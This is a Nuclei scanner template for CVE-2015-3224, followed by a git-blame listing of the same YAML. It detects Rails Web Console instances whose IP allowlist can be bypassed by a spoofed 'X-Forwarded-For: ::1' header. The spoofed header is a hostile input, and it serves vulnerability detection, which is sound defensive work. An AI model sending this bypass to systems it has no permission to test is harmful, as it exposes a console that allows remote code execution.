nuclei-templates/cves/2015/CVE-2015-3224.yaml

id: CVE-2015-3224

info:
  name: Ruby on Rails Web Console - Remote Code Execution
  author: pdteam
  severity: critical
  reference:
    - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
    - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
    - https://hackerone.com/reports/44513
    - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
  tags: cve,cve2015,rce,rails,ruby
  description: "request.rb in Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request."
  classification:
    cve-id: CVE-2015-3224

requests:
  - method: GET
    path:
      - "{{BaseURL}}/{{randstr}}"

    headers:
      X-Forwarded-For: ::1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Rails.root:"
          - "Action Controller: Exception caught"
        condition: and

      - type: word
        part: response
        words:
          - "X-Web-Console-Session-Id"
          - "data-remote-path="
          - "data-session-id="
        case-insensitive: true
        condition: or
Added CVE-2015-3224 (Ruby on Rails Web Console - Remote Code Execution) (#4248) 2022-04-26 21:55:12 +00:00			`id: CVE-2015-3224`

			`info:`
			`name: Ruby on Rails Web Console - Remote Code Execution`
			`author: pdteam`
			`severity: critical`
			`reference:`
			`- https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/`
			`- https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/`
			`- https://hackerone.com/reports/44513`
			`- https://nvd.nist.gov/vuln/detail/CVE-2015-3224`
			`tags: cve,cve2015,rce,rails,ruby`
Auto Generated CVE annotations [Tue Apr 26 21:55:38 UTC 2022] :robot: 2022-04-26 21:55:38 +00:00			`description: "request.rb in Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request."`
Dashboard Content Enhancements (#4268) Dashboard Content Enhancements 2022-04-29 19:58:07 +00:00			`classification:`
			`cve-id: CVE-2015-3224`
Added CVE-2015-3224 (Ruby on Rails Web Console - Remote Code Execution) (#4248) 2022-04-26 21:55:12 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/{{randstr}}"`

			`headers:`
			`X-Forwarded-For: ::1`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "Rails.root:"`
			`- "Action Controller: Exception caught"`
			`condition: and`

			`- type: word`
			`part: response`
			`words:`
			`- "X-Web-Console-Session-Id"`
			`- "data-remote-path="`
			`- "data-session-id="`
			`case-insensitive: true`
Dashboard Content Enhancements (#4268) Dashboard Content Enhancements 2022-04-29 19:58:07 +00:00			`condition: or`